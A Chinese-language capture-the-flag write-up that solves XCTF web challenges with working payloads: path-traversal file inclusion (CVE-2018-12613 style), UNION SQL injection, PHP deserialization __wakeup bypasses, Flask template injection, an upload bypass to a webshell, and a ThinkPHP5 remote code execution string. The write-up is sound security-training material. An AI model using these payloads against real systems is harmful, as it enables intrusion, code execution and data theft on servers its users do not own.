XCTF web進階區wp（一）

Training-WWW-Robots

查看robots.txt，發現Disallow: /fl0g.php，打開後得到flag。

baby_web

初始頁面爲index.php，bp抓包查看響應就行

warmup

F12拿到源碼鏈接source.php

hint.php：flag not here, and flag in ffffllllaaaagggg

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

checkFile函數的作用：

• 判斷page是否被設置，是否爲字符串
• 判斷page是否在whitelist中
• 以?爲分割符取出之前的字符，保存在$_page
• 判斷$_page是否在whitelist中
• url解碼後以?爲分割符取出之前字符，判斷是否在whitelist中

CVE-2018-12613 phpmuadmin後臺文件包含漏洞

payload：source.php?file=hint.php%253f../../../../../../../ffffllllaaaagggg

NewsCenter

毫無過濾的sql注入，直接一步步查或者上sqlmap就行了

-1' union select 1,2,3 from information_schema.tables
-1' union select 1,database(),3 from information_schema.tables#
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news'#
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'#
-1' union select 1,fl4g,3 from secret_table#

NaNNaNNaNNaN-Batman

給文件加上html後綴，把最後一句的eval改成alert再打開就會彈出源碼

正則後的內容拼接起來得到be0f233ac7be98aa，eval執行一下就能拿到flag

unserialize3

<?php

class xctf
{
	public $flag = '111';
	public function __wakeup()
	{
		exit('bad requests');
	}
}

$a = new xctf();
print(serialize($a))

?>

當反序列化字符串中，表示屬性個數的值大於其真實值，則跳過__wakeup()執行。

Payload：?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

upload1

這題有個前端驗證，如果後綴名不符合的話不能點擊上傳

可以修改前端，也可以先上傳jpg再抓包修改

菜刀連上去，找一下flag就行了

Web_python_template_injection

python flask模板注入，這裏直接給出payload

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

學習鏈接：https://www.freebuf.com/column/187845.html

Web_php_unserialize

兩個點

• O:4 -> O:+4繞過preg_match的 [oc]:\d+ 正則匹配
• 序列化數組的1換成2，大於真實的屬性個數繞過__wakeup()

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
    $A = new Demo('fl4g.php');
    $C = serialize($A);
    //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
    $C = str_replace('O:4', 'O:+4',$C);//繞過preg_match
    $C = str_replace(':1:', ':2:',$C);//繞過wakeup
    var_dump($C);
    var_dump(base64_encode($C));
?>

Payload：?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

php_rce

Think PHP5 遠程代碼執行漏洞

Payload：?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat%20../../../flag");'
參考鏈接：https://www.cnblogs.com/yuzly/p/11460285.html